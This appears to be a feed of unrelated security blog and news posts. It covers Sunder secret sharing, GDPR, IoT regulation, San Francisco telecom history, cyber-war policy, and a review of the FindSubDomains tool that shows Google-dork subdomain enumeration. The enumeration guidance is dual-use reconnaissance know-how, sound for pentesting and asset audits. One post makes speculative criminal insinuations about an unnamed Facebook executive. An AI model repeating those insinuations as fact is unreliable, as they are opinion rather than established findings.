Secret sharing can also be used to protect the confidentiality of materials over a long-running project. An example would be a documentary film project accumulating terabytes of footage that have to be stored safely. By "sundering" the key to an encrypted drive containing archival footage, the filmmaking team could reduce the risk of accidental or deliberate disclosure.

But most importantly, we want to hear what you think. Please give Sunder a spin by downloading one of the releases and following the documentation, and please take our survey!


Disclaimer

As noted above, Sunder is still alpha quality software. It's very possible that this version has bugs and security issues, and we do not recommend it for high stakes use cases. Indeed, Sunder and the underlying library have not received a third party audit yet.

Furthermore, any secret sharing implementation is only as robust as the operational security around it. If you distribute or store shares in a manner that can be monitored by an adversary (e.g., online without the use of end-to-end encryption) this could compromise your security.


Inquiries

For inquiries, please contact us at sunder@freedom.press.



Credits

Sunder was primarily developed by Gabe Isman and Garrett Robinson. Conor Schaefer has acted as a maintainer and release manager; Lilia Kai recently also joined the project as a maintainer. RustySecrets was developed by the RustySecrets team. Conversations between Ed Snowden and Frederic Jacobs were the original impetus for the project.

SN 662: Spectre – NextGen

This week we begin by updating the status of several ongoing security stories: Russia vs Telegram, DrupalGeddon2, and the return of RowHammer. We will conclude with MAJOR new bad news related to Spectre. We also have a new cryptomalware, Twitter's in-the-clear passwords mistake, new Android 'P' security features, a crazy service for GDPR compliance, Firefox's sponsored content plan, another million routers being attacked, more deliberately compromised JavaScript found in the wild, a new Microsoft Meltdown mistake, a comprehensive Windows command reference, and signs of future encrypted Twitter DMs.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.


‘World of Warcraft’ cyberattacker sentenced to year in prison

One World of Warcraft player is paying the price for taking a virtual rivalry too far. A US federal court has sentenced Romanian man Calin Mateias to spend a year in federal prison after he pleaded guilty to launching a distributed denial of service attack against WoW's servers in response to being "angered" by one player. The 2010 traffic flood knocked thousands of players offline and cost Blizzard $30,000 (which Mateias repaid in April) in recovery expenses.

Source: NBC Los Angeles

Chinese spies linked to decade-long hacking campaign

China's long-running hacking efforts may be more extensive than first thought. Security researchers at ProtectWise's 401TRG team have determined that a long series of previously unconnected attacks are actually part of a concerted campaign by Chinese intelligence officials. Nicknamed the Winnti umbrella, the effort has been going on since "at least" 2009 and has struck game companies (like Nexon and Trion) and other tech-driven businesses to compromise political targets.

Via: Ars Technica

Source: 401TRG

Algorithmic discrimination: A coming storm for security?

“If you don’t understand algorithmic discrimination, then you don’t understand discrimination in the 21st century.”

Bruce Schneier’s words, which came at the end of his wide-ranging session at RSA Conference last week, continued to echo in my ears long after I returned from San Francisco. Schneier, the well-known security expert, author and CTO of IBM Resilient, was discussing how technologists can become more involved in government policy, and he advocated for joint computer science-law programs in higher education.

“I think that’s very important. Right now, if you have a computer science-law degree, then you become a patent attorney,” he said. “Yes, it makes you a lot of money, but it would be great if you could work for the ACLU, the Southern Poverty Law Center and the NAACP.”

Those organizations, he argued, need technologists that understand algorithmic discrimination. And given some recent events, it’s hard to argue with Schneier’s point. But with all of the talk at RSA Conference this year about the value of machine learning and artificial intelligence, just as in previous years, I wondered if the security industry truly does understand the dangers of bias and discrimination, and what kind of problems will come to the surface if it doesn’t.

Inside the confines of the Moscone Center, algorithms were viewed with almost complete optimism and positivity. Algorithms, we’re told, will help save time and money for enterprises that can’t find enough skilled infosec professionals to fill their ranks.

But when you step outside the infosec sphere, it’s a different story. We’re told how algorithms, in fact, won’t save us from vicious conspiracy theories and misinformation, or hate speech and online harassment, or any number of other negative factors afflicting our digital lives.

If there are any reservations about machine learning and AI, they are generally limited to a few areas such as improper training of AI models or how those models are being used by threat actors to aid cyberattacks. But there’s another issue to consider: how algorithmic discrimination and bias could negatively impact these models.

This isn’t to say that algorithmic discrimination will necessarily afflict cybersecurity technology in a way that reveals racial or gender bias. But for an industry that so often misses the mark on the most dangerous vulnerabilities and persistent yet preventable threats, it’s hard to believe infosec’s own inherent biases won’t somehow be reflected in the machine learning and AI-based products that are now dominating the space.

Will these products discriminate against certain risks over more pressing ones? Will algorithms be designed to prioritize certain types of data and threat intelligence at the expense of others, leading to data discrimination? It’s also not hard to imagine racial and ethnic bias creeping into security products with algorithms that demonstrate a predisposition toward certain languages and regions (Russian and Eastern Europe, for example). How long will it take for threat actors to pick up on those biases and exploit them?

It’s important to note that in many cases outside the infosec industry, the algorithmic havoc is wreaked not by masterful black hats and evil geniuses but by your average internet trolls and miscreants. They simply spent enough time studying how, for example, YouTube functions on a day-to-day basis and flooded the systems with content to figure out how they could weaponize search engine optimization.

If Google can’t construct algorithms to root out YouTube trolls and prevent harassers from abusing the site’s search and referral features, then why do we in the infosec industry believe that algorithms will be able to detect and resolve even the low-hanging fruit that afflicts so many organizations?

The question isn’t whether the algorithms will be flawed. These machine learning and AI systems are built by humans, and flaws come with the territory. The question is whether they will be – unintentionally or purposefully – biased, and if those biases will be fixed or reinforced as the systems learn and grow.

The world is full of examples of algorithms gone wrong or nefarious actors gaming systems to their advantage. It would be foolish to think infosec will somehow be exempt.

The post Algorithmic discrimination: A coming storm for security? appeared first on Security Bytes.

GDPR deadline: Keep calm and GDPR on

You may know that the GDPR deadline — May 25, 2018 — is almost upon us.

In less than a month, the European Union will begin enforcing its new General Data Protection Regulation, or GDPR. Some companies will face disabling fines of as much as 20 million euros, or 4% of global annual turnover, whichever is higher. Some companies will have spent millions to be compliant with the new rules on protecting the privacy of EU data subjects (anyone resident in the EU), while some companies will have spent nothing when the GDPR deadline arrives.

For example, according to a survey by technology non-profit CompTIA, U.S. companies are not doing well with GDPR preparations. It found that 52% of the 400 U.S. companies surveyed are still either exploring how GDPR applies to their business, trying to determine whether GDPR is a requirement for their business, or simply unsure. The research also revealed that just 13% of firms say they are fully compliant with GDPR, 23% are “mostly compliant” and 12% claim they are “somewhat compliant.”

That is not an isolated finding. A poll released this month by Baker Tilly Virchow Krause, LLP, revealed that 90% of organizations do not have controls in place to be compliant with GDPR before the deadline.

GDPR deadline versus Y2K

In four weeks, once the GDPR deadline has passed, will the privacy Armageddon be upon us?

Probably not.

For IT and infosec pros of a certain age, the GDPR deadline echoes the panic of an earlier and more innocent time: January 1, 2000.

I certainly remember that time.

Also known as the year 2000 bug, the Y2K challenge, like GDPR, represented a problem that would require massive amounts of human, computing and financial resources to solve — and with a hard deadline that could not be argued with. The practice of coding years with just the last two digits in dates was clearly going to cause problems, and created its own industry for remediation of those problems in legacy systems of all types across the globe.

Much of the news coverage leading up to the millennium’s end focused on its impact on the world in the form of computers that could react unpredictably to the calendar change, especially all the embedded computers that controlled (and still control) so much of the modern landscape.

There were worries about whether air traffic control systems could cope with Y2K, worries that embedded computer-heavy airplanes would fall out of the sky, electric grids would fail, gas pumps would stop pumping and much worse was in store unless all systems were remediated.

The late software engineer Edward Yourdon, author of “Time Bomb 2000” and one of the leading voices of Y2K preparation, told me he had moved to a remote rural location where he was prepared to function without computers until the fallout cleared.

The GDPR deadline, on the other hand, represents an artificial milestone. After this date, if a company’s practices are not in line with the regulation and something happens as a result of those practices, the company may be fined — but the wheels won’t fall off unexpectedly, nor will any systems fail catastrophically and without notice.

Some of the big U.S. companies that will be affected by the GDPR, like Facebook, Twitter, Microsoft and many others, have already taken action. And many companies that believe they won’t be affected, or that aren’t sure, are taking the “wait and see” approach, rather than attempting to be proactive and address, at great cost, privacy concerns before worrying about the potentially huge fines.

Both approaches will make sense, depending on the company.

It may be heresy, but there are probably many U.S. companies that don’t need to worry too much about the upcoming GDPR deadline:

  • Failing companies need not worry about GDPR. If they are having trouble keeping the lights on, a huge GDPR penalty might spell the end of the company — but that doesn’t mean the company would be prospering in a world without privacy regulations.
  • Business to business companies that do not have EU data subjects as their customers likely have little to fear from GDPR enforcement.
  • Companies that do not solicit, collect or process personally identifiable information about their EU customers should also have little to fear from GDPR enforcement.

Most notably, there are — I hope — companies that don’t need to make special preparation for the GDPR deadline because while they may not be explicitly compliant with the GDPR, they already take the principles of privacy and security seriously.

Enforcement of the GDPR begins in a month, but that doesn’t mean the headlines on May 26 will herald the levying of massive fines against GDPR violators. In time the fines will surely rain down on violators, but companies with the right attitude toward privacy can stay calm, for now.

While the magnitude of the importance of the Y2K challenge faded almost immediately after January 1, 2000, the importance of enforcing data privacy protections through the GDPR will only continue to grow after the deadline.

The post GDPR deadline: Keep calm and GDPR on appeared first on Security Bytes.

Hackers find an ‘unpatchable’ way to breach the Nintendo Switch

Security researchers from ReSwitched have discovered a Nintendo Switch vulnerability that could let hackers run arbitrary code on all current consoles. Dubbed "Fusée Gelée" ("Frozen Rocket") it exploits buggy code in the NVIDIA Tegra X1's USB recovery mode, bypassing software that would normally protect the critical bootROM. Most worrisome for Nintendo is that the bug appears to be unpatchable and could allow users to eventually run pirated games.

Via: Ars Technica

Source: Kate Tempkin (Github)

To Cyber or Not to Cyber…That is the RSAC Talk Analysis

I don’t know where you are, but the data analysis of the RSA Conference by the prestigious Cyentia Institute is amazing. They wrote algorithms to tell us what the “most important” talks are each year from 25 years of security conference data, and illustrate our industry’s trend over time. Who can forget “A top 10 topic in 2009 was PDAs”?

This is the slide that made everyone laugh, of course:

Trends going up? GDPR, Ransomware, Financial Gain and Extortion. Big Data exploded up and then trends down over the last five years.

Trends going down? BYOD, SOX, GRC, Hacktivism, Targeted Attack, Endpoint, Mobile Device, Audit, PCI-DSS, APT, Spam…

Endpoint going down is fascinating, given that a marketing war among ex-McAfee executives is going full-bore. RSAC 2018 Expo Protip: people working inside Crowdstrike and Cylance are hinting on the show floor that they are unhappy with the noise being made about high-bar attribution to threat actors, given the low-bar performance and value of their actual products.

That’s just a pro doing qualitative sampling, though. Who knows how reliable the sources are, so weigh the limitations of qualitative analysis accordingly.

Some cyber companies talk threat actor the way Lockheed Martin talks when it wants to sell you its latest bomb technology. Is that bomb effective? It depends on how and what we measure. Ask me about 1968 OP IGLOO WHITE, which spent $1B/year on technology based on threat-actor discussions almost exactly like those we see in the ex-McAfee Marketing Executive company booths…

5 Common Sense Security and Privacy IoT Regulations

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

For most of human history, the balance of power in commercial transactions has been heavily weighted in favour of the seller. As the Romans would say, caveat emptor – buyer beware!

However, there is just as long a history of people using their collective power to protect consumers from unscrupulous sellers, whose profits are too often based on externalising their costs, which are then borne by society. Probably the earliest known consumer safety law is found in Hammurabi’s Code, nearly 4,000 years ago – it is quite a harsh example:

If a builder builds a house for someone, and does not construct it properly, and the house which he built falls in and kills its owner, then that builder shall be put to death.

However, consumer safety laws as we know them today are a relatively new invention. The Consumer Product Safety Act became law in the USA in 1972. The Consumer Protection Act became law in the UK in 1987.

Today’s laws provide for stiff penalties – for example the UK’s CPA makes product safety issues into criminal offenses liable with up to 6 months in prison and unlimited fines. These laws also mandate enforcement agencies to set standards, buy and test products, and to sue sellers and manufacturers.

So if you sell a household device that causes physical harm to someone, you run some serious risks to your business and to your personal freedom. The same is not true if you sell a household device that causes very real financial, psychological, and physical harm to someone by putting their digital security at risk. The same is not true if you sell a household device that causes very real psychological harm, civil rights harm, and sometimes physical harm to someone by putting their privacy rights at risk. In those cases, your worst case risk is currently a slap on the wrist.

This situation may well change at the end of May 2018, when the EU General Data Protection Regulation (GDPR) goes into force across the EU, and for all companies with any presence or doing business in the EU. The GDPR provides two very welcome threats that can be wielded against would-be negligent vendors: the possibility of real fines – up to 2% of worldwide turnover; and a presumption of guilt if there is a breach – it will be up to the vendor to show that they were not negligent.

However, the GDPR does not specifically regulate digital consumer goods – in other words Internet of Things (IoT) “smart” devices. Your average IoT device is a disaster in terms of both security and privacy – as our Mikko Hypponen‘s eponymous Law states: “smart device” = “vulnerable device”, or if you prefer the Fennel Corollary: “smart device” = “vulnerable surveillance device”.

The current IoT market is like the household goods market before consumer safety laws were introduced. This is why I am very happy to see initiatives like the UK government’s proposed Secure by Design: Improving the cyber security of consumer Internet of Things Report. While the report has many issues, there is clearly a need for the addition of serious consumer protection laws in the security and privacy area.

So if the UK proposal does not go far enough, what would I propose as common sense IoT security and privacy regulation? Here are 5 things I think are mandatory for any serious regulation in this area:

  1. Consumer safety laws largely work due to the severe penalties in place for any company (and their directors) who provide consumers with goods that place their safety in danger, as well as the funding and willingness of a governmental consumer protection agency to sue companies on consumers’ behalf. The same rigorous, severe, and funded structure is required for IoT goods that place consumers’ digital and physical security in danger.
  2. The danger to consumers from IoT goods is not only in terms of security, but also in terms of privacy. I believe similar requirements must be put in place for Privacy by Design, including severe penalties for any collecting, storing, and selling (whether directly, or indirectly via profiling for targeting of advertising) of consumers’ personal data if it is not directly required for the correct functioning of the device and service as seen by the consumer.
  3. Similarly, the requirements should include a strict prohibition on any backdoor, including government or law enforcement related, to access user data, usage information, or any form of control over the devices. Additionally, the requirements should include a strict prohibition on vendors providing any such information or control via “gentleman’s agreements” with a governmental or law enforcement agency/representative.
  4. In terms of the requirements for security and privacy, I believe that any requirements specifically written into law will always be outdated and incomplete. Therefore I would mandate independent standards agencies in a similar way to other internet governing standards bodies. A good example is the management of TLS certificate security rules by the CA/Browser Forum.
  5. Requirements must also deal with cases of IoT vendors going out of business or discontinuing devices and/or software updates. There must be a minimum software update duration, and in the case of discontinuation of support, vendors should be required to provide the latest firmware and update tool as Open Source to allow support to be continued by the user or a third party.

Just as there will always be ways for a determined person to hack around any physical or software security controls, people will find ways around any regulations. However, it is still better to attempt to protect vulnerable consumers than to pretend the problem doesn’t exist; or even worse, to blame the users who have no real choice and no possibility to have any kind of informed consent for the very real security and privacy risks they face.

Let’s start somewhere!

RSA Conference 2018: Fun Telco History in SF

Welcome to SF everyone! As the RSA Conference week begins, which really is a cluster of hundreds of security conferences running simultaneously for over 40,000 people converging from around the world, I sometimes get asked for local curiosities.

As a historian I feel the pull towards the past, and this year is no exception. Here are three fine examples from hundreds of interesting security landmarks in SF.

Chinese Telephone Exchange

During a period of rampant xenophobia in America, as European immigrants were committing acts of mass murder (e.g. Deep Creek, Rock Springs) against Asian immigrants, a Chinese switchboard in 1887 came to life in SF (just before the Scott Act). By 1901 it moved into a 3-tier building at 743 Washington Street. Here’s a little context for how and why the Chinese Telephone Exchange was separated from other telephone services:

Today when you visit Chinatown in SF you may notice free tea tastings are all around. This is a distant reminder of life 100 years ago, even for visitors to the Chinese Telephone Exchange, as a San Francisco Examiner report describes in 1901:

Tea and tobacco are always served to visitors, a compliment of hospitality without which no Chinese business transaction is complete

At its peak of operation, about 40 women memorized the names and switching algorithms for 1,500 lines in five dialects of Chinese, as well as English of course. Rather than use numbers, callers would ask to be connected to a person by name.

The service switched over 13,000 connections per day until it closed in 1949. Initially only men were hired, although after the 1906 earthquake only women were. Any guesses as to why? An Examiner reporter in 1901 again gives context, explaining that men used anti-competitive practices to make women too expensive to hire:

The Chinese telephone company was to put in girl operators when the exchange was refitted, and doubtless it will be done eventually. The company prefers women operators for many reasons, chiefly on account of good temper.

But when the company found that girls would be unobtainable unless they were purchased outright, and that it would be necessary to keep a platoon of armed men to guard them, to say nothing of an official chaperon to look after the proprieties, the idea of girl operators was abandoned.

“They come too high,” remarks the facetious general manager, “but in the next century we’ll be able to afford them, for girls will be cheaper then.”

Pacific Telephone Building

One of the first really tall developments in SF, which towered above the skyline (so tall it was used to fly weather warning flags and lights) for the next 40 years, was the Pacific Telephone office building. At 140 New Montgomery Street, PacTel poured $4 million into its flagship office building for 2,000 women to handle the explosive growth of telephone switching services (a far cry from the 40 mentioned above at 743 Washington Street).

By 1928, the year after 140 New Montgomery was completed, the San Francisco Examiner declared “with clay from a hole in the ground in Lincoln, California, the modern city of San Francisco has come.”

It was modeled after a Gottlieb Eliel Saarinen design that lost a Chicago competition, and came to life because of the infamous local architect Timothy Pflueger. Pflueger never went to college yet left us a number of iconic buildings such as Olympic Club, Castro Theater, Alhambra Theater, and perhaps most notably for locals, a series of beautiful cocktail lounges created in the prohibition years.

AT&T Wiretap

Fast-forward to today and there are several windowless tall buildings scattered about the city, filled with automated switches connecting the city’s copper and fiber. One of particular note is 611 Folsom Street, near the latest boom in startups.

Unlike the many years of American history where telco staff would regularly moonlight by working for the police, this building gained attention for a retired member of staff who disclosed his surprise and disgust that President Bush had set up surreptitious multi-gigabit taps on telco peering links.

“What the heck is the NSA doing here?” Mark Klein, a former AT&T technician, said he asked himself.

A year or so later, he stumbled upon documents that, he said, nearly caused him to fall out of his chair. The documents, he said, show that the NSA gained access to massive amounts of e-mail and search and other Internet records of more than a dozen global and regional telecommunications providers. AT&T allowed the agency to hook into its network at a facility in San Francisco and, according to Klein, many of the other telecom companies probably knew nothing about it.

[…]

The job entailed building a “secret room” in an AT&T office 10 blocks away, he said. By coincidence, in October 2003, Klein was transferred to that office and assigned to the Internet room. He asked a technician there about the secret room on the 6th floor, and the technician told him it was connected to the Internet room a floor above. The technician, who was about to retire, handed him some wiring diagrams.

“That was my ‘aha!’ moment,” Klein said. “They’re sending the entire Internet to the secret room.”

[…]

Klein was last in Washington in 1969, to take part in an antiwar protest. Now, he said with a chuckle, he’s here in a gray suit as a lobbyist.

In some sense we’ve come a long way since 1887, tempting us to look at how different things are from technological change, and yet in other ways things haven’t moved very far at all.

Recommended Reading: Facebook’s influence on Instagram

Instagram looks like Facebook's best hope
Sarah Frier,
Bloomberg Businessweek

With all the attention on Mark Zuckerberg's visit to DC this week, it can be easy to lose sight of an important detail: Facebook also owns Instagram. Of course, this means it also has access to the photo-sharing app's massive user base. Bloomberg Businessweek has a detailed look at the relationship between the two companies as Instagram approaches 1 billion total users.

US discusses authorizing cyber attacks outside “war zone”

In a nutshell, traditional definitions of war linked to kinetic action and physical space are being framed as overly restrictive given a desire by some to engage in offensive attacks online. The head of NSA is asking whether reducing that link and authorizing cyber attack within a new definition of “war” would affect the “comfort” of those holding responsibility.

“[On offense] the area where I think we still need to get a little more speed and agility — and as Mr. Rapuano indicated it is an area that is currently under review right now — what is the level of comfort in applying those capabilities outside designated areas of hostility,” Rogers asked out loud.

“I don’t believe anyone should grant Cyber Command or Adm. Rogers a blank ticket to do whatever you want, that is not appropriate. The part I am trying to figure out is what is the appropriate balance to ensure the broader set of stakeholders have a voice.”

Rapuano also referenced challenges associated with defining “war” in the context of cyber, which can be borderless due to the interconnected nature of the internet.

“In a domain that is so novel in many respects, and for which we do not have the empirical data and experience associated with military operations per se, particularly outside areas of conflict, there are some relatively ambiguous areas around ‘well what constitutes traditional military activities,'” said Rapuano. “This is something that we are looking at within the administration and we’ve had a number of discussions with members and your staffs; so that’s an area we’re looking at to understand the trades and implications of changing the current definition.”

While I enjoy people characterizing the cyber domain as novel and borderless, let’s not kid ourselves too much. The Internet has far more borders and controls established, not to mention a capability to deploy more at speed, given they are primarily software based. I can deploy over 40,000 new domains with high walls in 24 hours; there’s simply no way to leverage borders as effectively in the physical world.

Even more to the point I can distribute keys to access in such a way that it spans authorities and bureaucratically slows any attempts to break in, thus raising a far stronger multi-jurisdictional border to entry than any physical crossing.

We do ourselves no favors pretending technology is always weaker, disallowing for the prospect of a shift to stronger boundaries of less cost, and forgetting that Internet engineering is not so much truly novel as a revision of prior attempts in history (e.g. evolution of transit systems).

My recent talk at AppSecCali for example points out how barbed wire combined with repeating rifles established borders faster and more effectively than the far more “physical” barriers that came before. Now imagine someone in the 1800s calling a giant field with barbed wire border-less because it was harder for them to see in the same context as a river or mountain…

Lessons in Secrets Management from a Navy SEAL

Good insights from these two paragraphs about the retired Rear Admiral Losey saga:

Speaking under oath inside the Naval Base San Diego courtroom, Little said that Losey was so scared of being recorded or followed that when the session wrapped up, the SEAL told the Navy investigator to leave first, so he couldn’t identify the car he drove or trace a path back to his home.

[…]

…he retaliated against subordinates during a crusade to find the person who turned him in for minor travel expense violations.

Holding Facebook Executives Responsible for Crimes

Interesting write-up on Vox about the political science of Facebook, and how it has been designed to avoid governance and accountability:

…Zuckerberg claims that precisely because he’s not responsible to shareholders, he is able instead to answer his higher responsibility to “the community.”

And he’s very clear, as he says in interview after interview and hearing after hearing, that he takes this responsibility very seriously and is very sorry for having violated it. Just as he’s been sorry ever since he was a first-year college student. But he’s never actually been held responsible.

I touched on this in my RSA presentation about driverless cars several years ago. My take was the Facebook management is a regression of many centuries (pre-Magna Carta). Their primitive risk control concepts, and executive team opposition to modern governance, puts us all on a path of global catastrophe from automation systems, akin to the Cuban Missile Crisis.

I called it “Dar-Win or Lose: The Anthropology of Security Evolution.”

It is not one of my most watched videos, that’s for certain.

It seems like talks over the years where I frame code as poetry, with AI security failures like an ugly performance, I garner far more attention. If the language all programmers know best is profanity, who will teach their machines manners?

Meanwhile, my references to human behavior science to describe machine learning security, such as this one about anthropology, fly below radar (pun intended).

Supply Chain Accountability: Will There Be a Cyber Toyota War?

Back in 2015 there was some serious consideration of why Toyota were so often used by terrorist groups the US considered their enemy. Here’s some manufacturers-gonna’-manufacture rationalization:

All of this is to show that any sort of dark alliance between Toyota and the Islamic State is completely specious. The Toyota happens to be the vehicle with the greatest utility; the color of the pickup truck is driven by Asian tastes and the fact that desert heat dictates that white cars are simply more comfortable than black ones; and that Toyota trucks are driven by ISIS is dictated more by the sheer numbers produced and a reputation for quality than some nefarious plot by a well-respected Japanese automaker to supply a terroristic organization.

Simply put: It’s practically guaranteed that any paramilitary force in the Middle East will standardize on white Toyota pickup trucks.

It’s not an unreasonable argument to make. My main quibble with that article is it says nothing about Chad. If you’re going to talk about Toyota at war, you have to at least make mention of the US role with Toyota pickups sent into battle January 2, 1987:

…no one would have ever guessed that the Toyota pickup truck would come to play an important role in warfare history. This is the little-known story of how an army comprising 400 Toyota pickups outgunned, outsmarted, and outmaneuvered a superior force equipped with tanks and aircraft.

[…]

In the brutal engagement with 1,200 Libyan soldiers and 400 members of the Democratic Revolutionary Council militia, the Chadian army and its Toyota pickups made mincemeat of the Libyan stronghold in Fada. At the end of the day, the Libyan armored brigade in Fada had lost 784 soldiers, 92 T-55 battle tanks, and 33 BMP-1 infantry fighting vehicles.

Chadian losses, on the other hand, were minimal: 18 soldiers and 3 Toyota pickup trucks. January 3 and 4 saw the Libyan Air Force try to annihilate the Chadian soldiers and their trucks, but all bombing attempts failed thanks to the outstanding mobility of the Toyota Hilux.

Ok so let’s be frank. It is preposterous to say no one would have ever guessed superior technology would come to play an important role in warfare history. That is literally what happens in every major conflict. Warriors don’t ignore advantages. So there’s a very good argument against that perspective up top, which is that Toyota have for many decades been supplying exactly the technology desired in warfare, and watching the global purchases turn into military purposes.

“Don’t worry about transport, my good bud Habre, we’re flying Toyotas in tonight for you by C-130”

Whether Toyota can or should stop product flow somewhere along the route is another story. Consider for example that its pickup trucks are assembled in San Antonio, Texas and Baja California, Mexico. Hyundai vehicles converted into VBIEDs were said to have been the result of a local manufacturing plant simply overrun by military forces. How difficult control of Toyota’s supply chain is can further be demonstrated by American companies that lately have been boasting of redirecting Toyota machines straight into warfare:

Battelle, an applied sciences and technology company based in Columbus, Ohio has put out a video explaining how it turns ordinary vehicles into extraordinary ones. According to the company, it’s been creating what it calls “non-standard commercial vehicles” since 2004. Battelle sources Toyota HiLux pickup trucks and Land Cruiser sport utility vehicles, as well as Ford Ranger pickups as a baseline to create their “non-standard” vehicles.

Non-standard sounds far better than dark alliance or nefarious plot, I have to admit. Ultimately, though, it comes back to Toyota staying on top of its total supply chain and helping investigate cases where its supply violates the law or its values.

On the one hand releasing product into the wild (e.g. right to repair) creates freedom from corporate control; on the other hand corporations have a duty to reduce harms that result from their creations. Balance between those two ends is best, as history tells us it’s never going to be perfect on either end of the spectrum.

See also: “[Recipient of President Reagan’s product shipments] sentenced to life for war crimes”

“As a country committed to the respect for human rights and the pursuit of justice, this is also an opportunity for the United States to reflect on, and learn from, our own connection with past events in Chad,” [Secretary of State Kerry] said, apparently referring to U.S. support for Habre in the 1980s to help assuage the influence of Libya’s Moammar Gadhafi.

UK Army Museum Reveals Hidden World of the Special Forces

The National Army Museum in Chelsea, London has freshly opened a new exhibit for you to see if you can see what you’re not supposed to see:

The exhibition looks at the work of [five elite] units as well as the skills and dedication needed to make the cut.

From real-life events, like the Iranian Embassy Siege, to portrayals in popular culture, come and explore the hidden world of the Special Forces.

With just 85 views so far of their promotional video, I’m going to sneak out on a limb here to say coming out of the shadows might be harder than the museum thinks.

Will Facebook CSO Face Jail Time?

Russell Wasendorf allegedly stole over $215 million from his customers and falsified bank statements to cover it up. Bernie Madoff was arrested for losing $50 billion while running Ponzi schemes. Jeffrey Skilling was initially sentenced to 24 years in prison and fined $45 million for recording projected future profits as actual profits.

Is the Facebook CSO becoming the new Enron CFO story?

After all, the CSO in question is known for declaring projected future plans as actual security features. When he joined Yahoo to take his first ever job as CSO (also breached catastrophically during his short time there) he pre-announced end-to-end encryption was coming. He never delivered and instead quietly quit to take another shot at being CSO…at Facebook.

It’s serious food for thought when reading about the historic breaches of Facebook that began around the time he joined and continued for years under his watch. It’s been said he’s only giving lip service to users’ best interests (given his failed Yahoo delivery) and more recently it’s been said adversaries to the US targeted him as a “coin operated” asset (given his public hostility to US government).

At this point it will be interesting to see if standing idly for so long and allowing mounting harms to customers, personally profiting from damages done, will lead to any kind of penalty akin to Skilling’s.

“Today, given what we know… I think we understand that we need to take a broader view of our responsibility,” [CEO] said.

“That we’re not just building tools, but that we need to take full responsibility for the outcomes of how people use those tools as well.”

[…]

Facebook has now blocked the facility.

“It is reasonable to expect that if you had that [default] setting turned on, that in the last several years someone has probably accessed your public information in this way,” Mr Zuckerberg said.

The last several years represent the tenure of the CSO in question. “Today, given what we know?” That responsibility was no secret before he joined, and it should not have taken so many years to come to the realization that a CSO is meant to stop harm instead of profiting from it. So the question becomes what is next for the man whose first and only two attempts at being a CSO have ended in the largest breaches in history.

Finding subdomains for open source intelligence and pentest


Many of us are in the security consulting business, or bug bounties, or even network intelligence, and now and then come across a need to find subdomains. The requirement can come from either side of the table - a consultant assessing a client's internet presence, or a company validating its own digital footprint. In more than a decade, I have seen it happen so many times that people are not aware of what old assets they are running, and hence those assets can be exploited to damage the brand image, or the actual networks. These assets can also be used as proxies or hops to gain access to thought-to-be-well-guarded data.

The most common way to search for subdomains (that I have used) so far is an old-school Google search with dorks: site:example.com. To dig deeper, iterate with all visible subdomains from the results, i.e. site:example.com -www or site:example.com -www -test. This will exclude www.example.com and test.example.com from the results, surfacing others, and so on. Later I found some more tools like the Pentest-Tools subdomain finder, DNSDumpster, Cloudpiercer, Netcraft, etc. All these tools are either expensive or don't do the job well. Meh!
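The dork-iteration loop above is mechanical enough to script. A minimal sketch of the query-building step (the helper name is mine, and this only constructs the query string - it does not perform the search):

```python
def build_dork(domain: str, found_subdomains: list[str]) -> str:
    """Build a Google dork that excludes subdomains already found,
    so new ones surface in the next search iteration."""
    exclusions = " ".join(f"-{sub}" for sub in found_subdomains)
    return f"site:{domain} {exclusions}".strip()

# First pass, then two refinement passes as subdomains are discovered:
print(build_dork("example.com", []))               # site:example.com
print(build_dork("example.com", ["www"]))          # site:example.com -www
print(build_dork("example.com", ["www", "test"]))  # site:example.com -www -test
```

In practice the loop terminates quickly anyway, as described below: Google serves a CAPTCHA once it detects automated querying.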

Finally, while having a conversation with the SPYSE team (the astounding squad behind the CertDB project), I got to know about their new project - FindSubDomains, a free and fantastic tool to find subdomains for a given domain. Last time I covered their CertDB project in detail, and now, after being impressed by FindSubDomains, it was time to review and share this excellent tool with you! It not only lists subdomains but a whole lot of intelligence behind them, such as:

  1. IP Addresses
  2. DNS records
  3. Countries
  4. Subnets
  5. AS Blocks
  6. Organization names etc.

Any of these parameters can be used to filter or search the list of subdomains - I mean, it's terrific!
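As a rough illustration of that kind of filtering, here is how the exported data could be sliced locally; the record fields are my assumption based on what the UI displays, not an official export format:

```python
# Hypothetical records, shaped like the fields FindSubDomains displays
records = [
    {"subdomain": "www.apple.com", "country": "US", "as_block": "AS714"},
    {"subdomain": "dev.apple.com", "country": "US", "as_block": "AS714"},
    {"subdomain": "cdn.apple.com", "country": "IE", "as_block": "AS6185"},
]

def filter_by(records, field, value):
    """Keep only the records whose given field matches the value."""
    return [r for r in records if r[field] == value]

print([r["subdomain"] for r in filter_by(records, "country", "US")])
```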

But how does this stack up against the commonly known tools? Let's find out. For the sake of testing, let's take the domain apple.com and try finding its subdomains through different tools/mediums. Let's start with the old school Google search:


After only 4-5 searches/iterations, the process became tedious. And when you try to automate it, Google simply pops up a reCAPTCHA challenge. In general, it's fine for searching a few targeted domains, but useless for enumerating subdomains in the wild. Not recommended for such tasks!

How about using the Pentest-Tools service? First things first: it is not free and requires you to buy credits. I performed just a free search, and the results were not convincing:


After the search, it could only find 87 subdomains of apple.com, and the details included just the subdomain and its IP address. Netcraft and DNSDumpster had similarly disappointing results - the former found 180 records with no way to download or filter them, and the latter was capped at 150 results with a lousy UI/UX. To summarise, none of the tools could deliver a straightforward and intelligent list of subdomains.

FindSubDomains: Is it any different; any better?

To give you a straight answer - hell yes! Kudos to the SPYSE team; it is way better than the tools I was using before.
The same apple.com subdomain search performed via FindSubDomains returned 1900+ results. It is remarkable!

I mean when others failed miserably to provide even 200 results, FindSubDomains just nailed it with 1900+ results. Bravo!


All of these 1900+ results are at your disposal without paying a single cent - no pop-up advertisements, credits or caps. You can not only list the results in the UI but also download them as a TXT file. You can also view the IP address, geographical region, IP segment and respective AS block details for each subdomain. That is some remarkable open source intelligence, delivered in a second without scripts or endless iterations!

To me, the SPYSE team 100% justifies their project objective:

FindSubDomains is designed to automate subdomains discovering. This task often comes before system security specialists who study the company in the form of a black box in order to search for vulnerabilities, as well as for marketers and entrepreneurs whose goal is to competitively analyze other players on the market in the hope of quickly learning about the emergence of a new vector in the development of a competitor, as well as obtaining information about the internal infrastructure.

FindSubDomains: Search and Filter

